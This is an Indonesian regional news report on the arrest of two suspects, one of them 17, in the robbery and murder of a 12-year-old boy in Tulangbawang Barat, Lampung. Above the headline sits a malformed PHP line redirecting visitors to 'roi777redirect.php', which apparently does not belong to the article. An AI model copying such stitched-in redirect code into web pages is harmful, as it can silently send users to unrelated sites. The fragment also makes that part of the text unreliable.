header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pelaku Perampokan dan Pembunuhan Danu Paryoga‎ Tertangkap -
Pelaku Perampokan dan Pembunuhan Danu Paryoga‎ Tertangkap

TRANSLAMPUNG.COM, ‎PANARAGAN- Pelaku perampokan dan pembunuhan terhadap Danu prayoga (12) warga ‎Tiyuh Margo Mulyo, RT07/RW024, Kecamatan Tumijajar, Kabupaten Tulangbawang Barat (Tubaba) beberapa pekan lalu, berhasil diamankan jajaran anggota Gabungan Sektor Tulangbawang Tengah, Udik dan Tekap 308 Mapolres Tulang Bawang (Tuba), Rabu (27/12) sekira Pukul 07:00 WIB.

Penangkapan tersangka tersebut tersebut merupakan hasil dari pengembangan atas penemuan mayat korban dalam sumur di perkebunan sawit milik Elang warga Tiyuh Mekar Asri‎  RT04/RK01 Kecamatan Tulangbawang Tengah, Kabupaten setempat.

Menurut Kapolres Tulanng Bawang, AKBP Raswanto Hadiwibowo didampingi‎ Kasat Reskrim, AKP Dony Kristian Baralangi bahwa dari awal kejadian, Kamis (30/11) sekira pukul 13:00 Wib korban pamit dengan orang tuangnya untuk mengantarkan uang kerja kelompok dengan mengendarai motor Honda Beat warna merah dengan nopol BE 8300 HX. Dikarenakan korban tidak kunjung kembali kerumah hingga pukul 16:00 Wib, keluarga mencoba mencari keberadaan korban. Kemudian saat dihubungi melalui telpon genggamnya, No Handpone korban tidak aktif.

‎”Pencarian keluarga terhadap korban dilakukan sampai dengan hari Senin 11 Desember 2017, dikarenakan korban dicari tidak juga kunjung ketemu atas dasar tersebut orang tua korban (ayah tiri)  Supriyatna, langsung  membuat laporan orang hilang di Polsek Tulangbawang Udik dengan laporan bahwa anaknya telah hilang sejak  30 November 2017 hingga 11 Desember 2017 lalu,” kata AKP Dony saat dihubungi Trans Lampung via telpon, Kamis (28/12).

‎Pada hari Senin (11/12), lanjutnya, sekira pukul 13:00 Wib, salah satu warga, Roni saat itu sedang berburu tupai di perkebunan kelapa sawit milik  Elang warga Tiyuh Mekar Asri RT4/RK1, mencium bau tidak sedap di sekitar dia berburu. Kemudian karena merasa curiga, Roni mencari sumber bau tersebut dan menemukan sesosok mayat laki-laki dalam keadaan telungkup di dalam sumur.

“Saat itu karena tidak berani untuk melihat lebih jelas, akhirnya Roni menghubungi anggota polsek setempat yang sedang bertugas di pos Mulya Asri. Setelah mendengar laporan tersebut anggota polsek langsung mendatangi tempat kejadian perkara (TKP) dipimpin langsung oleh Kapolsek Tulanngbawang Tengah, Kompol Leksan Ariyanto,” katanya.

Lalu dia menambahkan, bahwa pada Rabu (27/12) Sekira Pukul 07:00 wib Anggota Penyelidik Tekab 308 Satreskrim Polres Tuba setelah melakukan serangkaian Giat Anatomy Crime serta penyelidikan sekitar 16 Hari bersama Kasat Reskrim, telah memperoleh keterangan yang sangat Kuat dari saksi-saksi. Kemudian pelaku yang diduga telah melakukan perampokan dan penganiayaan hingga menimbulkan korban jiwa akhirnya berhasil diamankan. Pelaku diamankan di Jalan Lintas Timur depan SPBU Indraloka, Kecamatan Way Kenanga, Kabupaten Tubaba.

“Tersangka bernama Supardi (19) warga Margo mulyo masih tetangga korban. Setelah dilakukan interogasi terhadap tersangka kemudian dia membenarkan dan mengakui perbuatannya bahwa telah melakukan pencurian terhadap 1 unit sepeda motor yang mengakibatkan korban Danu Prayoga meninggal,” terangnya.

Kemudian dilakukan pengembangan atas  Barang Bukti (BB) hasil kejahatan, selannjutnya kembali diamankan tersangka kedua yaitu Herwansyah berikut BB yang diduga telah menadah motor hasil curian dari pelaku di Kampung Gunung Batin Lampung Tengah (Lamteng). Setelah diinterogasi pelaku tersebut mengakui telah membeli motor dari Supardi dengan harga Rp1,5 juta, sementara Rp1 juta dibayar tunai dan sisanya Rp500 ribu dibayar dengan 1 unit HP Himax warna silver.

‎”Atas tindakan pelaku Supardi (19) selaku Buruh, warga Tiyuh Margo Mulyo dapat dijerat dengan Pasal 365 ayat 3 dan Pasal 80 ayat 3 Jo Pasal 76C UU No.35 tahun 2014 tentang perubahan atas UU No.23 tahun 2002 tentang Perlindungan Anak. Bahwa Supardi adalah pelaku utama, sementara Herwansyah‎ (17) warga Gunung Batin Udik,  Kecamatan Terusan Nyunyai, Lamteng ditetapkan sebagai penadahan dan dijerat  Pasal 480 KUHP,” ‎imbuhnya.

Sementara barang bukti yang berhasil diamankan dari tangan pelaku yakni, satu unit motor Honda Beat milik korban yang telah dirubah warna menjadi hitam tanpa plat nomor dengan kondisi nomor rangka dan nomor mesin telah lecet terhapus. Selain itu juga diamankan satu potong baju pakaian lengan panjang warna abu-abu merek Volcom, satu potong celana levis warna biru tua merek Lois, ‎ satu buah tali pinggang warna kuning‎ dan satu  buah topi warna hitam milik korban. (dir/hkw)

News Reporter